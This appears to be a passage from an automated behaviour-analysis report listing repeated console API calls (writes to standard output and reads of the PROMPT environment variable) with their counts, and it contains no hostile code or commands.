| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 9 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 15 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 33 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 20 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 9 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 15 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 33 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 20 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 9 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 15 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 33 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 20 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 9 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 15 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 33 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 20 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 9 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 15 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 33 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 20 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 9 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 15 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 33 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 20 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 9 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 15 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 33 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 20 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 9 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 15 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 33 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 20 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 9 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 15 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 33 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 20 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 9 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 15 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 33 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 20 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 9 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 15 |
|
